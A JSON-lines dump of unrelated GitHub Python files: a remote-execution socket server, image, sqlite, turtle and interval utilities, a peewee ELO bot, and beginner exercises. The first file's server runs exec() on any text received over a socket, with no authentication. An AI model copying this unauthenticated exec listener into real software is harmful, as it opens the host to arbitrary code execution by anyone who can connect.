self.logger.log_to(f\"binding to {_address}\")\n self.listen(1)\n\n @property\n def logger(self):\n if not hasattr(self, \"_logger\"):\n self._logger = self.thread.logger#\n\n return self._logger\n\n def handle_accepted(self, sock, address) -> None:\n self.logger.log_to(\"handle_accepted()\")\n self.logger.log_to(f\"[Server] Connection from: {address}\")\n self.response_handler = ResponseHandler(sock, self.thread)\n\n def handle_close(self) -> None:\n self.logger.log_to(\"Shutting down Server\")\n if self.response_handler:\n self.response_handler.handle_close()\n self.close()\n self.logger.log_to(\"Server shut down\")\n\n\nclass ResponseHandler(asyncore.dispatcher):\n \"\"\"\n Handles responding to messages from a single client.\n \"\"\"\n\n def __init__(self, socket, thread: ServerThread, chunk_size: int = 4096):\n\n self.thread = thread\n self.thread.response.connect(self.on_response)\n self.logger.log_to(\"ResponseHandler\")\n self.logger.log_to(f\"ResponseHandler: {socket.getsockname()}\")\n self.chunk_size = chunk_size\n super().__init__(socket)\n self.response_data: bytes = b\"\"\n\n @property\n def logger(self):\n if not hasattr(self, \"_logger\"):\n self._logger = self.thread.logger#\n\n return self._logger\n\n @QtCore.Slot(str)\n def on_response(self, data: str):\n self.logger.log_to(\"on_response\")\n self.response_data = bytes(f\"{data}<< {self.response_data}\")\n return bool(self.response_data)\n\n def handle_write(self):\n \"\"\"\n Write as much as possible of the most recent message we have received.\n \"\"\"\n\n data = self.response_data\n sent = self.send(data)\n if sent < len(data):\n self.response_data = data[sent:]\n\n # self.logger.log_to('handle_write() -> (%d) \"%s\"', sent, data[:sent])\n # if not self.writable():\n # self.handle_close()\n\n def handle_read(self):\n \"\"\"\n Read an incoming message from the client and put it into our outgoing queue.\n \"\"\"\n\n self.logger.log_to(\"handle_read()\")\n data = self.recv(self.chunk_size)\n data = str(data, encoding=\"ascii\")\n self.logger.log_to(f\"data: {data}\")\n # if data.endswith(\"<< ({len(_data)}) '{_data}'\"\n )\n\n def handle_close(self):\n self.logger.log_to(\"Shutting down ResponseHandler\")\n self.close()\n self.thread.response.disconnect(self.on_response)\n\n\nclass ServerThread(QtCore.QThread):\n \"\"\"\n Thread to run the asyncore.loop on.\n\n This prevents the interpreter the server is running 
on\n    from being blocked.\n    It is currently a QThread to make use of signals and\n    slots. These allow for thread safe communication as the\n    received data needs to be executed in the main thread.\n    \"\"\"\n\n    received = QtCore.Signal(str)\n    response = QtCore.Signal(str)\n\n    def __init__(self, address: tuple[str, int]):\n        super().__init__()\n        self.logger = logger.get_logger(\"ServerThread\")\n        # self.logger.enable_file_log(logging.DEBUG)\n        self.logger.log_to(\"ServerThread\")\n        self.server = Server(address, self)\n        self.received.connect(self.on_received)\n\n    def run(self):\n        asyncore.loop()\n\n    def stop(self):\n        self.server.handle_close()\n\n    @QtCore.Slot(str)\n    def on_received(self, data:str):\n        try:\n            self.logger.log_to(f\"Received data:\\n'{data}'\")\n            exec(data)\n        except Exception:\n            _traceback = traceback.format_exc()\n            self.logger.log_to(f\"Exception occurred:\\n{_traceback}\")\n            self.response.emit(_traceback)\n            return\n\n        self.response.emit(\"SUCCESS\")\n\n\nif __name__ == \"__main__\":\n\n    try:\n        st.stop()\n    except: pass\n    st = ServerThread((\"localhost\", 2001))\n    st.start()\n    # st.response.emit(\"SUCCESS\")","repo_name":"munkybutt/RemotePyxecute","sub_path":"src/remote_pyxecute/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"42251323363","text":"__author__ = 'heeckhau'\n\nimport os\nimport sys\nfrom PIL import Image\n\n#create gallery image from input\n\ndef create_gallery_image(input_image, gallery_thumbnail_path):\n    background = Image.open(\"images/others/stack_200_16.png\")\n    moz = Image.open(input_image)\n\n    # 16 + 168 + 16\n\n    sq_size = min(moz.size)\n    box_x = (moz.size[0]-sq_size)/2\n    box_y = (moz.size[1]-sq_size)/2\n    sq_box = (box_x, box_y, box_x + sq_size, box_y + sq_size)\n\n    square_moz = moz.crop(sq_box)\n    #square_moz.save(\"tmp1.png\")\n\n    resize_moz = square_moz.resize((168,168))\n    #resize_moz.save(\"tmp2.png\")\n\n    box = (16, 16, 16 + 168, 16 + 168)\n\n    background.paste(resize_moz, box)\n\n    new_file = gallery_thumbnail_path\n    print(new_file)\n\n    background.save(new_file)\n\nif __name__ == \"__main__\":\n    input_image = sys.argv[1]\n    if not os.path.isfile(input_image):\n        raise ValueError(\"Incorrect input\")\n\n    # thumbnail output path taken from the second CLI argument\n    create_gallery_image(input_image, sys.argv[2])\n\n\n\n","repo_name":"heeckhau/www.anneliesbuyssens.be","sub_path":"_python/create_gallery_image.py","file_name":"create_gallery_image.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19347396425","text":"# This example taken from the sqlite3 documentation at https://docs.python.org/3/library/sqlite3.html\n#\n\nimport sqlite3\nfrom sqlite3.dbapi2 import Connection, Cursor\n\n# Create a temporary database in memory.\nconn : Connection = sqlite3.connect(':memory:')\n# More usual is to have a database file, e.g.\n# conn = sqlite3.connect('example.db')\n\nc : Cursor = conn.cursor()\n\n# Create table\nc.execute('''CREATE TABLE stocks\n(date text, trans text, symbol text, qty real, price real)''')\n\n# Insert a row of data\nc.execute(\"\"\"INSERT INTO stocks\n    VALUES ('2006-01-05','BUY','RHAT',100,35.14)\"\"\")\n\n\n# Larger example that inserts many records at a time\npurchases = [('2006-03-28', 'BUY', 'IBM', 1000, 45.00),\n             ('2006-04-05', 'BUY', 'MSFT', 1000, 72.00),\n             ('2006-04-06', 'SELL', 'IBM', 500, 53.00),\n             ]\nc.executemany('INSERT INTO stocks VALUES (?,?,?,?,?)', purchases)\n\n# Save (commit) the 
changes\nconn.commit()\n\n# We can also close the cursor if we are done with it\nc.close()\n\n# Now retrieve the data\nc = conn.cursor()\nc.execute('SELECT * FROM stocks ORDER by price')\nfor row in c:\n    print(row)\n\nc.close()\nconn.close()\n","repo_name":"ExeterBScDTS/ECM2429-sqlite","sub_path":"lesson-01/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9332182053","text":"from turtle import Turtle, Screen\nimport turtle\nfrom itertools import cycle\nfrom random import shuffle\nimport tkinter\nimport time\nturtle.clearscreen()\n\ndef _dibujar_torta(pincel, radio, datos):\n    \"\"\"Draws the pie chart. Receives a pincel (Turtle), the radius of the circle and\n    the data to draw.\"\"\"\n\n    colores = [\"#8251FA\", \"#FA60C8\", \"#FA5262\", \"#FAA039\", \"#FAF40C\", \"#A4FA72\", \"#74FABC\", \"#77B8FA\", \"#4F5EFA\",\n               \"#FA1D38\"]\n\n    shuffle(colores)\n    ciclo_colores = cycle(colores) # colors in hex\n\n    pincel.penup()\n    pincel.sety(-radio)\n    pincel.pendown()\n\n    total = sum(fraccion for _, fraccion in datos) # data doesn't sum to 100 so adjust\n\n    for _, fraccion in datos: # _ ignores the label when unpacking the tuple data.\n        color = next(ciclo_colores)\n        pincel.pencolor(color)\n        pincel.fillcolor(color)\n        pincel.begin_fill()\n        pincel.circle(radio, fraccion * 360 / total)\n        posicion = pincel.position()\n        pincel.goto(0, 0)\n        pincel.end_fill()\n        pincel.setposition(posicion)\n\n\ndef _dibujar_etiquetas(pincel, radio, datos):\n    \"\"\"Draws the labels for each slice of the pie chart.\n    Receives a pincel (Turtle), the radius of the circle, the data and a total\"\"\"\n\n    total = sum(fraccion for _, fraccion in datos) # data doesn't sum to 100 so adjust\n\n    radio_etiqueta = radio * 1.33\n    tamaño_fuente = 18\n    fuente = (\"Ariel\", tamaño_fuente, \"bold\")\n\n    pincel.penup()\n    pincel.sety(-radio_etiqueta)\n\n    for etiqueta, fraccion in datos:\n        pincel.circle(radio_etiqueta, fraccion * 360 / total / 2)\n        pincel.write(etiqueta, align=\"center\", font=fuente)\n        pincel.circle(radio_etiqueta, fraccion * 360 / total / 2)\n\n\ndef dibujar_grafico_torta(datos, radio=200,tiempo=3):\n    \"\"\"This function receives in datos a list of tuples, where each tuple holds a label and a value to plot in\n    the pie chart. 
The default radius is 200\n    The parameters must follow a structure like the following:\n    datos = (list of tuples) [(\"A\",50),(\"B\",23),(\"C\",231),(\"D\",4),(\"E\",5)]\n    radio = (integer) 1,2,3,4..N --> the radius of the circumference of the chart\n    tiempo = (integer) 1,2,3,4,5..N --> the time in seconds the chart stays on screen before it can be removed\n    To use the function, call it from the main program with the desired data and radius\n    \n    Example call:\n\n    dibujar_grafico_torta([(\"A\",50),(\"B\",23),(\"C\",231),(\"D\",4),(\"E\",5)],150)\n    \"\"\"\n\n    turtle.clearscreen()\n\n    pincel = Turtle()\n    pincel.speed(10)\n    ventana = Screen()\n    _dibujar_torta(pincel, radio, datos)\n    pincel.pencolor(\"black\")\n    _dibujar_etiquetas(pincel, radio, datos)\n    #ventana.exitonclick()\n    tkinter.mainloop(30000000)\n    time.sleep(tiempo)\n","repo_name":"ucuraj/graficos_tortuga","sub_path":"grafico_de_torta.py","file_name":"grafico_de_torta.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74209896222","text":"from __future__ import print_function\n\nINT_EQ = 0 # Equivalent\nINT_B_IN_A = 1 # B in A\nINT_A_IN_B = -1 # A in B\nINT_DISJOIN = 2 # Disjoint\nINT_JOIN = 3 # Overlap\nINT_JOIN_AB = 4 # B starts at the end of A\nINT_JOIN_BA = 5 # A starts at the end of B\n\n\ndef cmp_interval(inter1, inter2):\n    \"\"\"Compare 
@inter1 and @inter2 and returns the associated INT_* case\n @inter1, @inter2: interval instance\n \"\"\"\n if inter1 == inter2:\n return INT_EQ\n\n inter1_start, inter1_stop = inter1\n inter2_start, inter2_stop = inter2\n result = INT_JOIN\n if inter1_start <= inter2_start and inter1_stop >= inter2_stop:\n result = INT_B_IN_A\n if inter2_start <= inter1_start and inter2_stop >= inter1_stop:\n result = INT_A_IN_B\n if inter1_stop + 1 == inter2_start:\n result = INT_JOIN_AB\n if inter2_stop + 1 == inter1_start:\n result = INT_JOIN_BA\n if inter1_start > inter2_stop + 1 or inter2_start > inter1_stop + 1:\n result = INT_DISJOIN\n return result\n\n\nclass interval(object):\n \"\"\"Stands for intervals with integer bounds\n\n Offers common methods to work with interval\"\"\"\n\n def __init__(self, bounds=None):\n \"\"\"Instance an interval object\n @bounds: (optional) list of (int, int) and/or interval instance\n \"\"\"\n if bounds is None:\n bounds = []\n elif isinstance(bounds, interval):\n bounds = bounds.intervals\n self.is_cannon = False\n self.intervals = bounds\n self.cannon()\n\n def __iter__(self):\n \"\"\"Iterate on intervals\"\"\"\n for inter in self.intervals:\n yield inter\n\n @staticmethod\n def cannon_list(tmp):\n \"\"\"\n Return a cannonizes list of intervals\n @tmp: list of (int, int)\n \"\"\"\n tmp = sorted([x for x in tmp if x[0] <= x[1]])\n out = []\n if not tmp:\n return out\n out.append(tmp.pop())\n while tmp:\n x = tmp.pop()\n rez = cmp_interval(out[-1], x)\n\n if rez == INT_EQ:\n continue\n elif rez == INT_DISJOIN:\n out.append(x)\n elif rez == INT_B_IN_A:\n continue\n elif rez in [INT_JOIN, INT_JOIN_AB, INT_JOIN_BA, INT_A_IN_B]:\n u, v = x\n while out and cmp_interval(out[-1], (u, v)) in [\n INT_JOIN, INT_JOIN_AB, INT_JOIN_BA, INT_A_IN_B]:\n u = min(u, out[-1][0])\n v = max(v, out[-1][1])\n out.pop()\n out.append((u, v))\n else:\n raise ValueError('unknown state', rez)\n return out[::-1]\n\n def cannon(self):\n \"Apply .cannon_list() on self contained intervals\"\n if self.is_cannon is True:\n return\n self.intervals = interval.cannon_list(self.intervals)\n self.is_cannon = True\n\n def __repr__(self):\n if self.intervals:\n o = \" U \".join([\"[0x%X 0x%X]\" % (x[0], x[1])\n for x in self.intervals])\n else:\n o = \"[]\"\n return o\n\n def __contains__(self, other):\n if isinstance(other, interval):\n for intervalB in other.intervals:\n is_in = False\n for intervalA in self.intervals:\n if cmp_interval(intervalA, intervalB) in [INT_EQ, INT_B_IN_A]:\n is_in = True\n break\n if not is_in:\n return False\n return True\n else:\n for intervalA in self.intervals:\n if intervalA[0] <= other <= intervalA[1]:\n return True\n return False\n\n def __eq__(self, i):\n return self.intervals == i.intervals\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def union(self, other):\n \"\"\"\n Return the union of intervals\n @other: interval instance\n \"\"\"\n\n if isinstance(other, interval):\n other = other.intervals\n other = interval(self.intervals + other)\n return other\n\n def difference(self, other):\n \"\"\"\n Return the difference of intervals\n @other: interval instance\n \"\"\"\n\n to_test = self.intervals[:]\n i = -1\n to_del = other.intervals[:]\n while i < len(to_test) - 1:\n i += 1\n x = to_test[i]\n if x[0] > x[1]:\n del to_test[i]\n i -= 1\n continue\n\n while to_del and to_del[0][1] < x[0]:\n del to_del[0]\n\n for y in to_del:\n if y[0] > x[1]:\n break\n rez = cmp_interval(x, y)\n if rez == INT_DISJOIN:\n continue\n elif rez == INT_EQ:\n del to_test[i]\n 
i -= 1\n break\n elif rez == INT_A_IN_B:\n del to_test[i]\n i -= 1\n break\n elif rez == INT_B_IN_A:\n del to_test[i]\n i1 = (x[0], y[0] - 1)\n i2 = (y[1] + 1, x[1])\n to_test[i:i] = [i1, i2]\n i -= 1\n break\n elif rez in [INT_JOIN_AB, INT_JOIN_BA]:\n continue\n elif rez == INT_JOIN:\n del to_test[i]\n if x[0] < y[0]:\n to_test[i:i] = [(x[0], y[0] - 1)]\n else:\n to_test[i:i] = [(y[1] + 1, x[1])]\n i -= 1\n break\n else:\n raise ValueError('unknown state', rez)\n return interval(to_test)\n\n def intersection(self, other):\n \"\"\"\n Return the intersection of intervals\n @other: interval instance\n \"\"\"\n\n out = []\n for x in self.intervals:\n if x[0] > x[1]:\n continue\n for y in other.intervals:\n rez = cmp_interval(x, y)\n\n if rez == INT_DISJOIN:\n continue\n elif rez == INT_EQ:\n out.append(x)\n continue\n elif rez == INT_A_IN_B:\n out.append(x)\n continue\n elif rez == INT_B_IN_A:\n out.append(y)\n continue\n elif rez == INT_JOIN_AB:\n continue\n elif rez == INT_JOIN_BA:\n continue\n elif rez == INT_JOIN:\n if x[0] < y[0]:\n out.append((y[0], x[1]))\n else:\n out.append((x[0], y[1]))\n continue\n else:\n raise ValueError('unknown state', rez)\n return interval(out)\n\n\n def __add__(self, other):\n return self.union(other)\n\n def __and__(self, other):\n return self.intersection(other)\n\n def __sub__(self, other):\n return self.difference(other)\n\n def hull(self):\n \"Return the first and the last bounds of intervals\"\n if not self.intervals:\n return None, None\n return self.intervals[0][0], self.intervals[-1][1]\n\n\n @property\n def empty(self):\n \"\"\"Return True iff the interval is empty\"\"\"\n return not self.intervals\n\n def show(self, img_x=1350, img_y=20, dry_run=False):\n \"\"\"\n show image representing the interval\n \"\"\"\n try:\n import Image\n import ImageDraw\n except ImportError:\n print('cannot import python PIL imaging')\n return\n\n img = Image.new('RGB', (img_x, img_y), (100, 100, 100))\n draw = ImageDraw.Draw(img)\n i_min, i_max = self.hull()\n\n print(hex(i_min), hex(i_max))\n\n addr2x = lambda addr: ((addr - i_min) * img_x) // (i_max - i_min)\n for a, b in self.intervals:\n draw.rectangle((addr2x(a), 0, addr2x(b), img_y), (200, 0, 0))\n\n if dry_run is False:\n img.show()\n\n @property\n def length(self):\n \"\"\"\n Return the cumulated length of intervals\n \"\"\"\n # Do not use __len__ because we may return a value > 32 bits\n return sum((stop - start + 1) for start, stop in self.intervals)\n","repo_name":"cea-sec/miasm","sub_path":"miasm/core/interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":8511,"program_lang":"python","lang":"en","doc_type":"code","stars":3204,"dataset":"github-code","pt":"7"} +{"seq_id":"32866096276","text":"import datetime\n# import discord\n# import re\n# import psycopg2\nfrom peewee import *\nfrom playhouse.postgres_ext import *\n# import modules.exceptions as exceptions\nimport settings\nimport logging\n\nlogger = logging.getLogger('spiesbot.' 
+ __name__)\nelo_logger = logging.getLogger('spiesbot.elo')\n\ndb = PostgresqlDatabase(settings.psql_db, autorollback=True, user=settings.psql_user, autoconnect=False)\n\n\ndef tomorrow():\n return (datetime.datetime.now() + datetime.timedelta(hours=24)).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\nclass BaseModel(Model):\n class Meta:\n database = db\n\n\nclass Player(BaseModel):\n discord_id = BitField(unique=True, null=False)\n name = TextField(unique=False)\n elo = SmallIntegerField(default=1000)\n elo_max = SmallIntegerField(default=1000)\n is_banned = BooleanField(default=False)\n\n def leaderboard_rank(self, date_cutoff):\n # Returns player's position in the leaderboard, and total size of leaderboard\n\n # TODO: This could be replaced with Postgresql Window functions to have the DB calculate the rank.\n # Advantages: Probably moderately more efficient, and will resolve ties in a sensible way\n # But no idea how to write the query :/\n # http://docs.peewee-orm.com/en/latest/peewee/query_examples.html#find-the-top-three-revenue-generating-facilities\n\n query = Player.leaderboard(date_cutoff=date_cutoff)\n\n player_found = False\n for counter, p in enumerate(query.tuples()):\n if p[0] == self.id:\n player_found = True\n break\n\n rank = counter + 1 if player_found else None\n return (rank, query.count())\n\n def wins(self):\n\n q = Game.select().where(\n (Game.is_confirmed == 1) & (Game.winning_player == self)\n )\n\n return q\n\n def losses(self):\n q = Game.select().where(\n (Game.is_confirmed == 1) & (Game.losing_player == self)\n )\n\n return q\n\n def get_record(self):\n\n return (self.wins().count(), self.losses().count())\n\n def leaderboard(date_cutoff, max_flag: bool = False):\n\n if max_flag:\n elo_field = Player.elo_max\n else:\n elo_field = Player.elo\n\n query = Player.select().join(PlayerGame).join(Game).where(\n (Game.is_confirmed == 1) & (Game.completed_ts > date_cutoff) & (Player.is_banned == 0)\n ).distinct().order_by(-elo_field)\n\n if query.count() < 10:\n # Include all registered players on leaderboard if not many games played\n query = Player.select().order_by(-elo_field)\n\n return query\n\n def string_matches(player_string: str):\n # Returns QuerySet containing players in current guild matching string. 
Searches against discord mention ID first, then exact discord name match,\n # then falls back to substring match on name/nick\n\n try:\n p_id = int(player_string.strip('<>!@'))\n except ValueError:\n pass\n else:\n # lookup either on <@####> mention string or raw ID #\n query_by_id = Player.select().where(\n (Player.discord_id == p_id)\n )\n if query_by_id.count() > 0:\n return query_by_id\n\n if len(player_string.split('#', 1)[0]) > 2:\n discord_str = player_string.split('#', 1)[0]\n # If query is something like 'Nelluk#7034', use just the 'Nelluk' to match against discord_name.\n # This happens if user does an @Mention then removes the @ character\n else:\n discord_str = player_string\n\n name_exact_match = Player.select(Player).where(\n (Player.name ** discord_str) # ** is case-insensitive\n )\n\n if name_exact_match.count() == 1:\n # String matches DiscordUser.name exactly\n return name_exact_match\n\n name_substring_match = PlayerGame.select(PlayerGame.player, fn.COUNT('*').alias('games_played')).join(Player).where(\n (Player.name.contains(player_string))\n ).group_by(PlayerGame.player).order_by(-SQL('games_played'))\n\n if name_substring_match.count() > 0:\n return [l.player for l in name_substring_match]\n\n return []\n\n\nclass Game(BaseModel):\n name = TextField(null=True)\n is_confirmed = BooleanField(default=False)\n win_claimed_ts = DateTimeField(default=datetime.datetime.now) # set when game is claimed/entered\n completed_ts = DateTimeField(null=True, default=None) # set when game is confirmed and ELO is calculated\n name = TextField(null=True)\n losing_score = SmallIntegerField(default=1, null=True) # Score of losing player, so assumed to be 0, 1, or 2. Assumed that basically all ranked games are first to 3 (3-0, 3-1, 3-2)\n losing_player = ForeignKeyField(Player, null=False, backref='losing_player', on_delete='RESTRICT')\n winning_player = ForeignKeyField(Player, null=False, backref='winning_player', on_delete='RESTRICT')\n elo_change_winner = SmallIntegerField(default=0)\n elo_change_loser = SmallIntegerField(default=0)\n\n def __setattr__(self, name, value):\n if name == 'name':\n value = value.strip('\\\"').strip('\\'').strip('”').strip('“').title()[:35].strip() if value else value\n return super().__setattr__(name, value)\n\n def refresh(self):\n # refresh object in memory with fresh copy from database\n\n return type(self).get(self._pk_expr())\n\n def get_or_create_pending_game(winning_player, losing_player, name=None, losing_score=None):\n game, created = Game.get_or_create(winning_player=winning_player, losing_player=losing_player, is_confirmed=False, defaults={'name': name, 'losing_score': losing_score})\n if created and losing_score is None:\n # Attempted to input a game with no losing score - not allowed\n game.delete_instance()\n return None, False\n if created:\n PlayerGame.create(player=winning_player, game=game)\n PlayerGame.create(player=losing_player, game=game)\n return game, created\n\n def confirm(self, bypass_check=False):\n # Calculate elo changes for a newly-confirmed game and write new values to database\n\n if self.is_confirmed and not bypass_check:\n # checks to make sure we aren't confirming an already-confirmed game.\n # if bypass_check=True, confirming will be allowed to continue even if is_confirmed is set.\n # This is probably only used in recalculate_all_elo\n raise ValueError('Cannot confirm game - is_confirmed is already marked as True')\n\n logger.debug(f'Confirming game {self.id}')\n elo_logger.debug(f'Confirm game {self.id}')\n\n 
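# Both deltas are computed from the players' current (pre-game) ratings before any update is written\n        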
winner_delta = self.calc_elo_delta(for_winner=True)\n loser_delta = self.calc_elo_delta(for_winner=False)\n\n with db.atomic() as transaction:\n elo_logger.debug(f'Winning player {self.winning_player.name} going from {self.winning_player.elo} to {int(self.winning_player.elo + winner_delta)}')\n self.winning_player.elo = int(self.winning_player.elo + winner_delta)\n if self.winning_player.elo > self.winning_player.elo_max:\n self.winning_player.elo_max = self.winning_player.elo\n self.elo_change_winner = winner_delta\n\n elo_logger.debug(f'Losing player {self.losing_player.name} going from {self.losing_player.elo} to {int(self.losing_player.elo + loser_delta)}')\n self.losing_player.elo = int(self.losing_player.elo + loser_delta)\n self.elo_change_loser = loser_delta\n\n self.winning_player.save()\n self.losing_player.save()\n self.is_confirmed = True\n self.completed_ts = datetime.datetime.now()\n\n for playergame in self.playergame:\n if playergame.player == self.winning_player:\n playergame.elo_after_game = self.winning_player.elo\n else:\n playergame.elo_after_game = self.losing_player.elo\n playergame.save()\n\n update_count = self.save()\n if not update_count:\n # Could happen if game is deleted while Game object is still in memory and then a confirm is attempted, usually if a user deletes a game during the auto-confirm time\n transaction.rollback()\n raise Game.DoesNotExist('Game can not be found. No ELO changes saved.')\n\n return self.winning_player.elo, self.losing_player.elo\n\n def calc_elo_delta(self, for_winner=True):\n max_elo_delta = 32 # elo 'k' value\n\n def chance_of_winning(target_elo, opponent_elo):\n # Calculate the expected chance of winning based on one player's elo compared to their opponent's elo.\n return round(1 / (1 + (10 ** ((opponent_elo - target_elo) / 400.0))), 3)\n\n # Calculate a base change of elo based on your chance of winning and whether or not you won\n if for_winner is True:\n elo = self.winning_player.elo\n elo_delta = int(round((max_elo_delta * (1 - chance_of_winning(target_elo=elo, opponent_elo=self.losing_player.elo))), 0))\n else:\n elo = self.losing_player.elo\n elo_delta = int(round((max_elo_delta * (0 - chance_of_winning(target_elo=elo, opponent_elo=self.winning_player.elo))), 0))\n\n elo_boost = .60 * ((1200 - max(min(elo, 1200), 900)) / 300) # 60% boost to delta at elo 900, gradually shifts to 0% boost at 1200 ELO\n\n elo_bonus = int(abs(elo_delta) * elo_boost)\n elo_delta += elo_bonus\n\n if self.losing_score == 0:\n elo_delta = int(round(elo_delta * 1.15)) # larger delta for a 3-0 blowout\n elif self.losing_score == 2:\n elo_delta = int(round(elo_delta * 0.85)) # smaller delta for a 3-2 close game\n\n return elo_delta\n\n def reverse_confirmation(self):\n # revert elo changes and return game to unconfirmed state\n self.winning_player.elo += self.elo_change_winner * -1\n self.winning_player.save()\n self.elo_change_winner = 0\n\n self.losing_player.elo += self.elo_change_loser * -1\n self.losing_player.save()\n self.elo_change_loser = 0\n\n for playergame in self.playergame:\n playergame.elo_after_game = None\n playergame.save()\n\n self.is_confirmed = False\n self.completed_ts = None\n\n self.save()\n\n def delete_game(self):\n # resets any relevant ELO changes to players and teams, deletes related lineup records, and deletes the game entry itself\n\n logger.info(f'Deleting game {self.id}')\n recalculate = False\n with db.atomic():\n if self.is_confirmed:\n self.is_confirmed = False\n recalculate = True\n since = self.completed_ts\n\n 
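# Revert this game's ELO effects first; later confirmed games are re-run below via recalculate_elo_since\n                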
self.reverse_confirmation()\n\n for playergame in self.playergame:\n playergame.delete_instance()\n\n self.delete_instance()\n\n if recalculate:\n Game.recalculate_elo_since(timestamp=since)\n\n def recalculate_elo_since(timestamp):\n games = Game.select().where(\n (Game.is_confirmed == 1) & (Game.completed_ts >= timestamp)\n ).order_by(Game.completed_ts)\n\n elo_logger.debug(f'recalculate_elo_since {timestamp}')\n for g in games:\n g.reverse_confirmation()\n\n for g in games:\n g.confirm()\n elo_logger.debug(f'recalculate_elo_since complete')\n\n def recalculate_all_elo():\n # Reset all ELOs to 1000, and re-run Game.declare_winner() on all qualifying games\n\n logger.warn('Resetting and recalculating all ELO')\n elo_logger.info(f'recalculate_all_elo')\n\n with db.atomic():\n Player.update(elo=1000, elo_max=1000).execute()\n\n games = Game.select().where(\n (Game.is_confirmed == 1)\n ).order_by(Game.completed_ts)\n\n for game in games:\n game.confirm(bypass_check=True)\n\n elo_logger.info(f'recalculate_all_elo complete')\n\n\nclass PlayerGame(BaseModel):\n player = ForeignKeyField(Player, null=False, backref='playergame', on_delete='RESTRICT')\n game = ForeignKeyField(Game, null=False, backref='playergame', on_delete='CASCADE')\n elo_after_game = SmallIntegerField(default=None, null=True) # snapshot of what elo was after game concluded\n\n\nwith db:\n db.create_tables([Player, Game, PlayerGame])\n","repo_name":"Nelluk/Two-Spies-ELO-Bot","sub_path":"modules/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73309998944","text":"\nfrom sql_operator_folder.sql_operator import SqlOperator\n\nobj_sql_op = SqlOperator()\n\n\nclass AddAttendanceFunc:\n\n def add_attendance_func(self, employee_list, enter_date):\n\n for i in range(len(employee_list)):\n\n print(f\"Enter attendance for ID:{employee_list[i][0]} & Name:{employee_list[i][1]}\")\n attendance = input(\"Enter p for Present or a for Absent\")\n sql_attendance_query = \" INSERT INTO attendance_details(Date, Employee_ID, Attendance) VALUES (%s, %s, %s)\"\n values = (enter_date, employee_list[i][0], attendance)\n obj_sql_op.sql_write(sql_attendance_query, values)\n\n print(\"Attendance Added to the date:\",enter_date)","repo_name":"siddharthps75ps/leave2","sub_path":"db_handler_sql/add_attendance_func.py","file_name":"add_attendance_func.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9789909763","text":"import pandas as pd\nimport re\n\nberlin_areas = pd.read_csv('raw_data//berlin_areas.csv')\n\n# extracts the postcodes from the full address using regex\n\ndef extract_postcode(text):\n return re.findall(r'(?:^|\\D)(\\d{5})(?!\\d)', text)[0]\n\n# Returns district based on postcodes\n\ndef get_district(zip_code):\n zipco = berlin_areas.loc[berlin_areas['PLZ'] == int(zip_code), 'Stadtteil']\n\n if len(zipco) == 1:\n return berlin_areas.loc[berlin_areas['PLZ'] == int(zip_code),\n 'Stadtteil'].values[0]\n elif len(zipco) > 1:\n zip_co_lst = list(zipco)\n return zip_co_lst[0]\n\n# get zipcode and district for all restaurants\n\ndef district_to_df(df_name):\n df_name['zip_code'] = df_name.full_address.apply(extract_postcode)\n df_name['district'] = df_name.zip_code.apply(get_district)\n return df_name\n\n\nlist_districts =[\n 'All','Charlottenburg', 'Kreuzberg', 'Friedrichshain', 'Mitte', 'Neukölln',\n 
'Prenzlauer Berg', 'Schöneberg', 'Wilmersdorf', 'Wartenberg', 'Lichtenberg',\n 'Friedenau','Wedding','Charlottenburg-Nord', 'Moabit', 'Steglitz',\n 'Karlshorst', 'Pankow', 'Britz', 'Malchow', 'Tiergarten', 'Wittenau',\n 'Niederschöneweide', 'Alt-Hohenschönhausen', 'Tegel', 'Friedrichsfelde',\n 'Niederschönhausen','Alt-Treptow','Plänterwald', 'Französisch Buchholz',\n 'Reinickendorf','Tempelhof', 'Stadtrandsiedlung Malchow', 'Marienfelde',\n 'Marzahn', 'Baumschulenweg', 'Westend', 'Gesundbrunnen', 'Weißensee',\n 'Grunewald', 'Karow', 'Neu-Hohenschönhausen', 'Oberschöneweide', 'Mariendorf',\n 'Lichterfelde', 'Spandau', 'Blankenburg', 'Buckow', 'Lichtenrade', 'Heinersdorf'\n ]\n","repo_name":"shanudengre82/next_restaurant","sub_path":"next_restaurant/district.py","file_name":"district.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30817623676","text":"# A. match_ends\n# Given a list of strings, return the count of the number of\n# strings where the string length is 2 or more and the first\n# and last chars of the string are the same.\n# Note: python does not have a ++ operator, but += works.\ndef match_ends(words):\n\tcount = 0\n\tfor word in words:\n\t\tif len(word) >= 2 and word[0] == word[-1]:\n\t\t\tcount += 1\n\treturn count\n\n\n# B. front_x\n# Given a list of strings, return a list with the strings\n# in sorted order, except group all the strings that begin with 'x' first.\n# e.g. ['mix', 'xyz', 'apple', 'xanadu', 'aardvark'] yields\n# ['xanadu', 'xyz', 'aardvark', 'apple', 'mix']\n# Hint: this can be done by making 2 lists and sorting each of them\n# before combining them.\ndef front_x(words):\n\twords.sort()\n\tsortWords = [x for x in words if x[0] == 'x']\n\tsortWords = sortWords + [x for x in words if x not in sortWords]\n\treturn sortWords\n\n\n# C. sort_last\n# Given a list of non-empty tuples, return a list sorted in increasing\n# order by the last element in each tuple.\n# e.g. 
